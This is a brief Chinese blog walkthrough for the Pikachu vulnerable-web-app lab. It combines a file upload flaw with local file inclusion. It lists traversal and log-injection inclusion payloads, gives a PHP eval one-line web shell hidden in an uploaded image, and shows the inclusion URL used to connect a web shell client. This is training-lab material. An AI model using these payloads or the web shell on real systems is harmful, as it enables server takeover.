0
点赞
收藏
分享

微信扫一扫

pikaqiu 文件上传 和文件包含漏洞

泠之屋 2022-04-24 阅读 57

文件包含漏洞的

考虑常用的几种包含方式为

  • 同目录包含 file=.htaccess
  • 目录遍历 ?file=../../../../../../../../../var/lib/locate.db
  • 日志注入 ?file=../../../../../../../../../var/log/apache/error.log
  • 利用 /proc/self/environ其中日志可以使用SSH日志或者Web日志等多种日志来源测试

     一句话木马   <php @eval($_POST[pp]);?>


    打开pikachu靶场

查看上传的路径在什么地方

比较一下 插在什么地方

127.0.0.1/pikachu-master/vul/unsafeupload/uploads/22/04/24/6182166264bce3e286a273114413.jpg

打开文件包含 找到include 包好参数点,在做源码审计 第一步也是找到传参点

 

替换成文件上传的路径

 

然后使用菜刀进行连接

http://127.0.0.1/pikachu-master/vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/22/04/24/6182166264bce3e286a273114413.jpg%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

 

举报

相关推荐

0 条评论